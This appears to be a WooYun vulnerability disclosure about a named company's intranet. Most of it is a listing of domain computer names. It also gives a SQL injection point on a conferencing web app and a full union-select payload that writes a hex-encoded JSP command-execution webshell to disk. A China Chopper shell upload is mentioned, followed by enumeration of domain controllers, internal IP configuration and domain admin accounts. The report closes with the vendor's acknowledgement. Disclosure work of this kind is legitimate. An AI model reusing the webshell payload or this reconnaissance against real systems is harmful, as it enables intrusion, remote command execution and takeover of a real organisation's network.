HQ25-038$                HQ25-039$                HQ25-040$                
HQ25-041$                HQ25-043$                HQ25-044$                
HQ25-045$                HQ25-046$                HQ25-047$                
HQ25-050$                HQ25-051$                HQ25-052$                
HQ25-053$                HQ25-054$                HQ25-057$                
HQ25-058$                HQ25-059$                HQ25-061$                
HQ25-062$                HQ25-063$                HQ25-064$                
HQ25-065$                HQ25-066$                HQ25-067$                
HQ25-068$                HQ25-069$                HQ25-070$                
HQ25-071$                HQ25-072$                HQ25-074$                
HQ25-075$                HQ25-076$                HQ25-077$                
HQ25-078$                HQ25-079$                HQ25-080$                
HQ25-081$                HQ25-082$                HQ25-083$                
HQ25-084$                HQ25-085$                HQ25-086$                
HQ25-087$                HQ25-088$                HQ25-089$                
HQ25-090$                HQ25-091$                HQ25-092$                
HQ25-093$                HQ25-094$                HQ25-095$                
HQ25-098$                HQ25-099$                HQ25-101$                
HQ25-102$                HQ25-103$                HQ25-GUANNH$             
HQ25-ZHANGFQ$            HQ25-ZUOKZ$              HQ26-002$                
HQ26-003$                HQ26-004$                HQ26-006$                
HQ26-007$                HQ26-008$                HQ26-010$                
HQ26-011$                HQ26-012$                HQ26-013$                
HQ26-014$                HQ26-015$                HQ26-016$                
HQ26-017$                HQ26-018$                HQ26-019$                
HQ26-021$                HQ26-022$                HQ26-023$                
HQ26-025$                HQ26-026$                HQ26-028$                
HQ26-029$                HQ26-030$                HQ26-031$                
HQ26-032$                HQ26-033$                HQ26-034$                
HQ26-035$                HQ26-036$                HQ26-037$                
HQ26-038$                HQ26-039$                HQ26-040$                
HQ26-041$                HQ26-042$                HQ26-043$                
HQ26-045$                HQ26-046$                HQ26-047$                
HQ26-048$                HQ26-050$                HQ26-051$                
HQ26-052$                HQ26-054$                HQ26-40$                 
HQ26-DINGJC$             HQ26-GUMF$               HQ26-GUOCJ$              
HQ26-LIMINGHUI$          HQ26-LINGYAN$            HQ26-LIUJY$              
HQ26-LIWEI03$            HQ26-LIYING$             HQ26-MACAN$              
HQ26-MENGXQ$             HQ26-TANNN$              HQ26-WANGXIN$            
HQ26-YANGJR$             HQ26-YUQUN$              HQ26-ZHANGKP$            
HQ27-001$                HQ27-002$                HQ27-003$                
HQ27-004$                HQ27-005$                HQ27-007$                
HQ27-009$                HQ27-010$                HQ27-011$                
HQ27-014$                HQ27-016$                HQ27-017$                
HQ27-018$                HQ27-019$                HQ27-020$                
HQ27-021$                HQ27-023$                HQ27-024$                
HQ27-026$                HQ27-027$                HQ27-028$                
HQ27-029$                HQ27-030$                HQ27-033$                
HQ27-035$                HQ27-037$                HQ27-038$                
HQ27-039$                HQ27-042$                HQ27-043$                
HQ27-045$                HQ27-046$                HQ27-047$                
HQ27-048$                HQ27-049$                HQ27-050$                
HQ27-051$                HQ27-052$                HQ27-053$                
HQ27-054$                HQ27-057$                HQ27-058$                
HQ27-059$                HQ27-060$                HQ27-061$                
HQ27-062$                HQ27-063$                HQ27-064$                
HQ27-065$                HQ27-066$                HQ27-067$                
HQ27-068$                HQ27-070$                HQ27-071$                
HQ27-072$                HQ27-073$                HQ27-074$                
HQ27-075$                HQ27-076$                HQ27-077$                
HQ27-078$                HQ27-079$                HQ27-080$                
HQ27-081$                HQ27-081-NB$             HQ27-082$                
HQ27-083$                HQ27-084$                HQ27-085$                
HQ27-086$                HQ27-088$                HQ27-089$                
HQ27-090$                HQ27-091$                HQ27-092$                
HQ27-093$                HQ27-094$                HQ27-095$                
HQ27-096$                HQ27-50$                 HQ27-CHENYONG03$         
HQ27-CHENYUE01$          HQ27-GONGXUE$            HQ27-JIANGTAO$           
HQ27-KANGZN$             HQ27-LIJY$               HQ27-LIUPENG01$          
HQ27-LIUWM$              HQ27-LIUYFANG$           HQ27-LIYW$               
HQ27-LUYJ$               HQ27-MALL$               HQ27-MAOHQ$              
HQ27-PANYAN$             HQ27-SHENJUAN$           HQ27-SHIQING$            
HQ27-WANGCHUAN$          HQ27-WANGCHUN$           HQ27-WANGXLEI$           
HQ27-XUMING$             HQ27-XUXP$               HQ27-YUANYAN$            
HQ27-YUJW$               HQ27-ZHAIXY$             HQ27-ZHANGCHAO$          
HQ27-ZHANGCQIN$          HQ27-ZHANGMAI$           HQ27-ZHAOHENG$           
HQ27-ZHOUWY$             HQ27-ZHUJUN$             HQ28-002$                
HQ28-003$                HQ28-004$                HQ28-005$                
HQ28-006$                HQ28-007$                HQ28-009$                
HQ28-010$                HQ28-011$                HQ28-013$                
HQ28-014$                HQ28-015$                HQ28-016$                
HQ28-018$                HQ28-021$                HQ28-022$                
HQ28-024$                HQ28-026$                HQ28-027$                
HQ28-029$                HQ28-030$                HQ28-033$                
HQ28-034$                HQ28-037$                HQ28-039$                
HQ28-040$                HQ28-043$                HQ28-044$                
HQ28-046$                HQ28-047$                HQ28-048$                
HQ28-049$                HQ28-052$                HQ28-053$                
HQ28-054$                HQ28-055$                HQ28-056$                
HQ28-058$                HQ28-059$                HQ28-061$                
HQ28-064$                HQ28-066$                HQ28-068$                
HQ28-069$                HQ28-072$                HQ28-073$                
HQ28-074$                HQ28-075$                HQ28-076$                
HQ28-077$                HQ28-078$                HQ28-080$                
HQ28-082$                HQ28-083$                HQ28-084$                
HQ28-085$                HQ28-086$                HQ28-087$                
HQ28-088$                HQ28-091$                HQ28-900$                
HQ28-999$                HQ28-CHENJUN02$          HQ28-CHENQIAN$           
HQ28-DINGSUIKUN$         HQ28-GAOYD$              HQ28-HUXB$               
HQ28-JINXIN$             HQ28-LIANGZH$            HQ28-LICHUNWEI$          
HQ28-LIJZHONG$           HQ28-LINYANG$            HQ28-LIUJLIANG$          
HQ28-LIUPAN$             HQ28-LUYG$               HQ28-MAJC$               
HQ28-MAOXQ01$            HQ28-SUNLW$              HQ28-SUNXIAORON$         
HQ28-SUNXR$              HQ28-TANMING$            HQ28-TANXIAO$            
HQ28-TAOLAN$             HQ28-WANGGL$             HQ28-WANGHL$             
HQ28-WANGKFEI$           HQ28-XUCHUNYAN$          HQ28-XUHONGCHAN$         
HQ28-YANGAH$             HQ28-YANGZHEN$           HQ28-YAOYAO$             
HQ28-YEHF$               HQ28-YEHR$               HQ28-ZHANGYOU$           
HQ28-ZHANGYXIN$          HQ28-ZHANGZHAO$          HQ28-ZHUYI$              
HQ28-ZONGDL$             HQ29-002$                HQ29-003$                
HQ29-004$                HQ29-005$                HQ29-006$                
HQ29-007$                HQ29-008$                HQ29-009$                
HQ29-010$                HQ29-011$                HQ29-013$                
HQ29-014$                HQ29-015$                HQ29-016$                
HQ29-018$                HQ29-018LS$              HQ29-019$                
HQ29-020$                HQ29-021$                HQ29-022$                
HQ29-024$                HQ29-025$                HQ29-026$                
HQ29-028$                HQ29-029$                HQ29-030$                
HQ29-031$                HQ29-032$                HQ29-033$                
HQ29-034$                HQ29-036$                HQ29-038$                
HQ29-040$                HQ29-041$                HQ29-042$                
HQ29-043$                HQ29-044$                HQ29-045$                
HQ29-047$                HQ29-050$                HQ29-051$                
HQ29-052$                HQ29-053$                HQ29-054$                
HQ29-055$                HQ29-056$                HQ29-057$                
HQ29-058$                HQ29-059$                HQ29-060$                
HQ29-061$                HQ29-49$                 HQ29-50$                 
HQ29-CHENFEI01$          HQ29-DINGYUE$            HQ29-GUOCHONG$           
HQ29-GUOFAN$             HQ29-MAOJIAN$            HQ29-PANRUI$             
HQ29-SUNJIN$             HQ29-WANGCONG01$         HQ29-WANGQJ$             
HQ29-ZHANGXT$            HQ29-ZHOUYAN$            HQ31-001$                
HQ31-002$                HQ31-003$                HQ31-005$                
HQ31-006$                HQ31-007$                HQ31-008$                
HQ31-010$                HQ31-012$                HQ31-015$                
HQ31-018$                HQ31-019$                HQ31-020$                
HQ31-030$                HQ31-LIQW$               HQ31-LIZL$               
HQ31-QIANYI$             HQ31-TANQY$              HQ31-ZHANGXL$            
HQ32-001$                HQ32-002$                HQ32-003$                
HQ32-005$                HQ32-006$                HQ32-007$                
HQ32-008$                HQ32-010$                HQ32-011$                
HQ32-013$                HQ32-014$                HQ32-015$                
HQ32-016$                HQ32-017$                HQ32-019$                
HQ32-021$                HQ32-023$                HQ32-024$                
HQ32-025$                HQ32-026$                HQ32-027$                
HQ32-028$                HQ32-029$                HQ32-032$                
HQ32-033$                HQ32-035$                HQ32-036$                
HQ32-037$                HQ32-038$                HQ32-039$                
HQ32-040$                HQ32-042$                HQ32-044$                
HQ32-045$                HQ32-046$                HQ32-047$                
HQ32-048$                HQ32-12$                 HQ32-HUANLH$             
HQ33-001$                HQ33-003-1$              HQ33-004$                
HQ33-013$                HQ33-015$                HQ33-016$                
HQ33-017$                HQ33-XUGB$               HQ34-002$                
HQ35-003$                HQ36-001$                HQ36-003$                
HQ36-005$                HQ36-006$                HQ36-007$                
HQ36-012$                HQ36-WUXIA$              HQ36-YINMY$              
HQ36-YUANXJIN$           HQ37-001$                HQ37-003$                
HQ37-005$                HQ37-010$                HQ37-011$                
HQ37-012$                HQ37-014$                HQ37-015$                
HQ37-016$                HQ37-017$                HQ37-017-2$              
HQ37-018$                HQ37-084$                HQ37-085$                
HQ37-CHENYONG$           HQ37-JIANGSJ$            HQ37-XUTAO$              
HQ37-ZHANGGANG$          HQ37-ZHANGYGUAN$         HQ37-ZHOUWEIHON$         
HQ42-HUXD$               HQ42-ZHANGHAO$           HQ42-ZHANGZJ$            
HQ43-DENGYB$             HQ43-YUANQIONG$          HQ43-ZHANGHONG$          
HQ44-SIWT$               HQ45-SHAOYUANYU$         HQ46-1468706$            
HQ46-DUYANG$             HQ46-GUOJX$              HQ46-GUXUAN$             
HQ46-LIUWJ$              HQ46-LIYIF$              HQ46-MAXC$               
HQ46-WANGCJ$             HQ46-WANGLH$             HQ47-CAIGOU$             
HQ47-CAOYJ$              HQ47-CHENYUWEI$          HQ47-CUIYUAN$            
HQ47-DONGBC$             HQ47-DONGJX$             HQ47-GUOJC$              
HQ47-GUOZJ$              HQ47-HEGQ$               HQ47-HEQI$               
HQ47-HUANGLY$            HQ47-JIANGHAIHA$         HQ47-JIANGHH$            
HQ47-LIBO$               HQ47-LIJUN01$            HQ47-LILL$               
HQ47-LIQING$             HQ47-LIUHH$              HQ47-MAMH$               
HQ47-NIUCHEN$            HQ47-PANDM$              HQ47-SHILIN$             
HQ47-SONGPING$           HQ47-SUNYU$              HQ47-SUSQ$               
HQ47-WANGFLI$            HQ47-WANGHY$             HQ47-WANGXYING$          
HQ47-WANGYUE$            HQ47-WANGYW$             HQ47-XIAJUN$             
HQ47-XINGZHENG$          HQ47-XUXIAO$             HQ47-XUYUN$              
HQ47-YANGPENG$           HQ47-YUSX$               HQ47-YUYANG$             
HQ47-ZHANGFAN$           HQ47-ZHANGXIJUA$         HQ47-ZHANGXLING$         
HQ47-ZHAOCC$             HQ47-ZHAOHUA$            HQ47-ZHAOHX$             
HQ47-ZHENGWEI$           HQ47-ZHOUKG$             HQ47-ZHOUSN$             
HQ47-ZHOUXIONGW$         HQ47-ZHOUXX$             HQ48-CAOZHENHUA$         
HQ48-CHENCHENG0$         HQ48-CHENCHUNHA$         HQ48-DOUZY$              
HQ48-HANSJ$              HQ48-HUJIAJIA$           HQ48-LIFENG$             
HQ48-LIUJJ$              HQ48-LVJL$               HQ48-MENFANG$            
HQ48-TANDZ-1$            HQ48-TANDZ-2$            HQ48-WANGSHAOC$          
HQ48-WEITK$              HQ48-ZHAOXL-1$           HQ48-ZHAOXL-2$           
HQ48-ZHUWEI01$           HQ49-CAIJY$              HQ49-CHENXIYANG$         
HQ49-CHENZJ$             HQ49-DINGMQ$             HQ49-GAOXC$              
HQ49-GUYB$               HQ49-HUANGBING$          HQ49-HUANGGX$            
HQ49-HUANGJS$            HQ49-JUFK$               HQ49-LUOMQ$              
HQ49-MEIGC$              HQ49-QIUKY$              HQ49-QUANFENG$           
HQ49-SHIYQ$              HQ49-SUNMY$              HQ49-SURONG$             
HQ49-WANGCY$             HQ49-WANGYG$             HQ49-XUWQ$               
HQ49-YANGFAN$            HQ49-YANGJI$             HQ49-YEZB$               
HQ49-YIQP$               HQ49-YUNP$               HQ49-ZHANGGZ$            
HQ49-ZHAOXF$             HQ49-ZHENGXF$            HQ49-ZHOUWEIHON$         
HQ49-ZHULIQIONG$         HQ49-ZHULQ$              HQ51-PID3$               
HQ51-WEIQING$            HQ51-YWQ$                HR-530$                  
HR-NB-01$                HR-NB-02$                HSE-SHARE$               
HUAZQ-NB$                HUBEI02$                 HUIYI105$                
HUIYI-107$               HUIYI109$                HUIYI-110$               
HUIYI-111$               HUYUANZHEN-NB$           HYS-106$                 
ISASVR1$                 IT-001$                  IT-002$                  
IT-003$                  IT-004$                  IT-005$                  
IT-006$                  JIANG-PC$                JMSVR$                   
JSSYFGS-006$             JSSYFGS009$              JSSYFGS012$              
JSSYFGS014$              JSSYFGS015$              JSSYFGS020$              
JSSYFGS07$               JSSYFGS-14$              JXHGCFGS001$             
JXHGCFGS003$             JXHGCFGS004$             JXHGCFGS006$             
JXHGCFGS007$             JXHGCFGS008$             JXHGCFGS009$             
JXHGCFGS010$             JXHGCFGS011$             JXHGCFGS012$             
JXHGCFGS013$             JXHGCFGS014$             JXHGCFGS016$             
JXHGCFGS017$             JXHGCFGS018$             JXHGCFGS019$             
JXHGCFGS020$             JXHGCFGS021$             JXHGCFGS024$             
JXHGCFGS025$             JXHGCFGS026$             JXHGCFGS027$             
JXHGCFGS028$             JXHGCFGS038$             JXHGCFGS047$             
JXHGCFGS048$             JXHGCFGS061$             JXHGCFGS065$             
JXHGCFGS066$             JXHGCFGS300$             JXHGCFGS301$             
JXHGCFGS302$             JXHGCFGS303$             JXHGCFGS304$             
JXHGCFGS305$             JXHGCFGS306$             JXHGCFGS307$             
JXHGCFGS308$             JXHGCFGS309$             JXHGCFGS310$             
JXHGCFGS311$             JXHGCFGS312$             JXHGCFGS313$             
JXHGCFGS314$             JXHGCFGS315$             JXHGCFGS316$             
JXHGCFGS350$             JXHGCFGS351$             JXHGCFGS352$             
KMSJFGS01$               KMSJFGS02$               L10-35$                  
LENOVO-PC$               LINXP-NB$                LIUJIAN01LS$             
LIULIANFENG-NB$          LIUSHENG-NB$             LIUYG-NB$                
LIUYG-NBLS$              LIUYH$                   LIYL-NBLS$               
LIZHIHAI-NB$             LLBJB-01$                LLBJB-02$                
LLBJB-03$                LUOHESHENLS$             LUYING-LSNB$             
MAILSERVER$              MAILSERVER1$             MAILSVR1$                
MAOZW-NB$                MAOZW-PC$                MAQING$                  
M-PC$                    MS-20150708BWJV$         NB-CHENCG$               
NB-DONGQUN$              NB-HQ06$                 NB-HQ15-080$             
NB-JIANGNING$            NB-LIAX$                 NB-LIJG$                 
NB-LIXIAN$               NB-LUZY$                 NB-RENXQ$                
NB-TAOHONG$              NB-WANGXN$               NB-YANJIE$               
NB-ZHUYI$                NDA-DT39$                NDA-DT48$                
NDA-DT51$                NDA-DT52$                NDA-DT53$                
NDA-DT54$                NDA-DT55$                NDA-DT56$                
NDA-DT57$                NDA-DT59$                NDA-DT60$                
NDA-DT61$                NDA-DT62$                NDA-DT63$                
NDA-DT64$                NDA-DT65$                NDA-DT67$                
NDA-DT68$                NDA-DT69$                NDA-DT70$                
NDA-DT71$                NDA-DT72$                NDA-DT73$                
NDA-DT74$                NDA-DT75$                NDA-DT76$                
NDA-DT77$                NDA-DT78$                NDA-DT79$                
NDA-DT80$                NDA-DT81$                NDA-DT82$                
NDA-DT83$                NDA-DT84$                NDA-DT85$                
NDA-DT86$                NDA-DT87$                NDA-DT88$                
NDA-DT89$                NDA-DT90$                NDA-DT91$                
NDA-DT92$                NDA-DT93$                NDA-DT94$                
NDA-DT95$                NDA-SR01$                NDA-SR02$                
NDA-SR03$                NDA-SR04$                NDA-SR05$                
NDA-SR06$                NJGC-001$                NJGC-002$                
NJGC-004$                NJGC-005$                NJGC-006$                
NJGC-A01$                NJGC-A02$                NJGC-A03$                
NJGC-A04$                NJGC-A05$                NJGC-A06$                
NJGC-A07$                NJGC-A08$                NJGC-A09$                
NJGC-A10$                NJGC-B01$                NJGC-B02$                
NJGC-B03$                NJGC-B04$                NJGC-B05$                
NJGC-B06$                NJGC-B07$                NJGC-B08$                
NJGC-B09$                NJGC-B10$                NJGCCLU01$               
NJGC-D01$                NJGC-D02$                NJGC-D03$                
NJGC-D04$                NJGC-D05$                NJGC-D06$                
NJGC-D07$                NJGC-D08$                NJGC-D09$                
NJGC-D10$                NJGC-DDC01$              NJGC-DDC02$              
NJGC-DHCP$               NJGC-E01$                NJGC-E02$                
NJGC-E03$                NJGC-E04$                NJGC-E05$                
NJGC-LIC$                NJGC-PVS01$              NJGC-PVS02$              
NJGC-SCVMM01$            NJGC-SF01$               NJGC-SF02$               
NJGC-SQL01$              NJGC-SQL02$              OASERVER$                
ORACLE-01$               ORALER-01$               P3SVR1$                  
PC--20120806YHI$         PC-20150308HJCT$         PDS-0714$                
PDS-0718$                PDS121$                  PDS122$                  
PDS123$                  PDS124$                  PDS125$                  
PDS208-137$              PDS2110$                 PDS-CHENMIN$             
PDSSVR1$                 PDSSVR2$                 PDSSVR3$                 
PDSSVR41$                PDSWKS001$               PDSWKS002$               
PDSWKS003$               PDSWKS004$               PDSWKS005$               
PDSWKS006$               PDSWKS008$               PDSWKS009$               
PDSWKS018$               PDSWKS104$               PDSWKS105$               
PDSWKS106$               PDSWKS107$               PDSWKS108$               
PDSWKS109$               PDS-WKS113$              PDSWKS117$               
PDSWKS177$               PDSWKS178$               PDSWKS179$               
PDWKS001$                PDWKS002$                PIDSVR01$                
PLACH$                   PMIS1$                   PMIS2$                   
PVSSTORE$                QIANJY-NB$               QIANXIN-NB$              
QINING-NB$               QINJHLS$                 QIUJINLONG-NB$           
REN-NB01$                RENQSBJB$                SAUDISERVER$             
SBFGS024-NB$             SBGCFGS$                 SBGCFGS001$              
SBGCFGS005$              SBGCFGS006$              SBGCFGS007$              
SBGCFGS008$              SBGCFGS010$              SBGCFGS013$              
SBGCFGS014$              SBGCFGS015$              SBGCFGS016$              
SBGCFGS017$              SBGCFGS018$              SBGCFGS019$              
SBGCFGS020$              SBGCFGS021$              SBGCFGS022$              
SBGCFGS025$              SBGCFGS026$              SBGCFGS027$              
SBGCFGS028$              SBGCFGS029$              SBGCFGS030$              
SBGCFGS048$              SBGCFGS057$              SBGCFGS064$              
SBGCFGS069$              SBGCFGS076$              SBGCFGS086$              
SBGCFGS118$              SBGCFGS119$              SBGCFGS120$              
SBGCFGS121$              SBGCFGS122$              SBGCFGS300$              
SBGCFGS301$              SBGCFGS302$              SBGCFGS303$              
SBGCFGS304$              SBGCFGS305$              SBGCFGS306$              
SBGCFGS307$              SCC-14ED70404CB$         SCGS02$                  
SCGS03$                  SDWM-20130326QC$         SEGS01$                  
SERVER3D$                SERVER-PPCS1$            SHANGYF-NBLS$            
SHAOSHUYAN-NB$           SHARE-ZLB$               SIWT$                    
SJGLB-GX$                SKY-20140911NLZ$         SMTPSERVER$              
SNB-1466791$             SNDI-94$                 SNEI-65676EF84D$         
SNEI-DCTM-CS1$           SNEI-DCTM-CS2$           SNEI-DCTM-CS3$           
SNEI-DCTM-CS4$           SNEI-DCTM-CS5$           SNEI-DCTM-CS6$           
SNEI-DCTM-DB1$           SNEI-DCTM-IDX1$          SNEI-DCTM-IDX2$          
SNEI-DCTM-IDX3$          SNEI-DCTM-WEB1$          SNEI-DCTM-WEB2$          
SNEI-DCTM-WEB3$          SNEI-DESIGN$             SNEI-FTP-SVR02$          
SNEI-FUJIAN$             SNEI-GCXMGL$             SNEI-P6R8$               
SNEISP3D$                SNEISP3D01$              SNEISP3D02$              
SNEISP3D03$              SNEISP3D04$              SNEI-VIRTUAL01$          
SNEI-VIRTUAL02$          SNEI-VIRTUAL03$          SNEI-VMM$                
SOFTLICSVR1$             SOFTLICSVR3$             SOFTLICSVR5$             
SONGHL-NBLS$             SONY-PC$                 SP3DSVR1$                
SP3DSVR2$                SP3DSVR3$                SP3DSVR5$                
SPFAPP$                  SPISQL01$                sql-alon1$               
sql-wsfc1$               SRV-DOMINO1$             SUMMER1$                 
SUNXIAORONGLS$           SUOPENG-NB$              TEST001$                 
test002$                 TESTIT$                  TESTPC$                  
V2SVR1$                  VDI-TEST$                virtual-cluster$         
VIRTUAL-SVR01$           VIRTUAL-SVR02$           VIRTUAL-SVR03$           
WANGAMLS$                WANGBIN-NBLS$            WANGBIN-PC$              
WANGCJ-NB$               WANGDONGGANG-NB$         WANGHMLS$                
WANGLYLS$                WANGMIN-NB$              WANGSX$                  
WANGSY-NB$               WANGXHUI-TEST$           WANGXIAOH-NBLS$          
WANGXMING-NBLS$          WANGXS-NB$               WANGYZ-NB$               
WDB-NB$                  WEBBER-PC$               WEIQING$                 
WINDOWS7-CTX-PC$         WUWEIJUN-NB$             XENDDC$                  
XINGCHEN-NBLS$           XMB-FUJ001$              XUXIANLS$                
YANTL-NB$                YAODIANX-NBLS$           YAODX-NB$                
YAOZHIGANG-BJB$          YAOZHIPING-NBLS$         YINGCHUNLS$              
YINGJW$                  YWGK02$                  ZHAIZLLS$                
ZHANGFENGLS$             ZHANGFQ-NBLS$            ZHANGJIE-NBLS$           
ZHANGLC-NB$              ZHANGLIKE-PC$            ZHANGLONG-NBLS$          
ZHANGYU-NBLS$            ZHANGZHIJIA-NB$          ZHANGZJ-NB$              
ZHAOBJLS$                ZHOUCHENLS$              ZHOUDONGLS$              
ZHOUWEI01-NBLS$          ZHUST$                   ZONGCL$                  
命令成功完成。


域用户就不列了
上个脚本把本网段的web服务跑一跑

62.png


看看域控
<code>C:\> net group "domain controllers" /domain
这项请求将在域 snei.com.cn 的域控制器处理。
组名 Domain Controllers
注释 域中所有域控制器
成员
-------------------------------------------------------------------------------
DCSVR1$ DCSVR2$ DCSVR3$
SNEI-FUJIAN2$ SNEI-NB-DC1$
命令成功完成。
C:\> ping SNEI-FUJIAN2
正在 Ping SNEI-FUJIAN2.snei.com.cn [10.150.228.12] 具有 32 字节的数据:
来自 10.150.228.12 的回复: 字节=32 时间=31ms TTL=125
来自 10.150.228.12 的回

漏洞证明:

注入点:http://v2.snei.com.cn//Conf/jsp/systembulletin/bulletinAction.dooperator=details
post
sysid=-1 union 注入
利用该注入直接写入shell
ysId=-1%20union%20select%200x3C2540207061676520636F6E74656E74547970653D22746578742F68746D6C3B20636861727365743D47424B2220253E0D0A3C2540207061676520696D706F72743D226A6176612E696F2E2A2220253E203C2520537472696E6720636D64203D20726571756573742E676574506172616D657465722822636D6422293B20537472696E67206F7574707574203D2022223B20696628636D6420213D206E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F636573732070203D2052756E74696D652E67657452756E74696D6528292E6578656328636D64293B204275666665726564526561646572207349203D206E6577204275666665726564526561646572286E657720496E70757453747265616D52656164657228702E676574496E70757453747265616D282929293B207768696C65282873203D2073492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E206529207B20652E7072696E74537461636B547261636528293B207D207D200D0A6F75742E7072696E746C6E286F7574707574293B253E,'','','','' into dumpfile '../../management/webapps/root/cmd.jsp'%23
上个菜刀马 index_cd.jsp

63.png


看下是不是在域里

C:\PROGRA~2\V2CONF~1\Management\webapps\ROOT\> ipconfig /all
Windows IP 配置
   主机名  . . . . . . . . . . . . . : v2svr1
   主 DNS 后缀 . . . . . . . . . . . : snei.com.cn
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
   DNS 后缀搜索列表  . . . . . . . . : snei.com.cn
以太网适配器 本地连接 4:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #4
   物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-D0
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是
以太网适配器 本地连接 3:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #3
   物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CF
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是
以太网适配器 本地连接 2:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : snei.com.cn
   描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #2
   物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CD
   DHCP 已启用 . . . . . . . . . . . : 是
   自动配置已启用. . . . . . . . . . : 是
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet
   物理地址. . . . . . . . . . . . . : D4-AE-52-9D-E3-CE
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::296e:f2cc:6642:2235%11(首选) 
   IPv4 地址 . . . . . . . . . . . . : 10.150.1.48(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.150.1.250
   DHCPv6 IAID . . . . . . . . . . . : 248819282
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1E-AA-0F-DD-D4-AE-52-9D-E3-CE
   DNS 服务器  . . . . . . . . . . . : 10.150.1.30
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用
隧道适配器 isatap.{18F0418B-44BA-4EB7-BD31-A8BF6B32DD99}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 isatap.{07D98EBF-A6F2-46EC-9899-12F2CEA8CB4A}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 isatap.snei.com.cn:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 isatap.{D56D1E3E-BAA0-49D7-8060-AC6FE8375B0E}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #4
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是


domain:snei.com.cn
看下域管理员组

C:\PROGRA~2\V2CONF~1\Management\webapps\ROOT\> net group "domain admins" /domain
这项请求将在域 snei.com.cn 的域控制器处理。
组名     Domain Admins
注释     指定的域管理员
成员
-------------------------------------------------------------------------------
Administrator            chujing                  dnsmgmt                  
fsvr                     gcxmdns                  huangjk                  
NJGC-VMM-Admin           snei-jm                  snei-virtual             
snei-xxgl01              wangjian07               zhust                    
命令成功完成。


修复方案:

问题太多,先把web系统升级把注入堵上吧

版权声明:转载请注明来源 obanions@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-09 11:08

厂商回复:

谢谢!我们会尽快修复。

最新状态:

暂无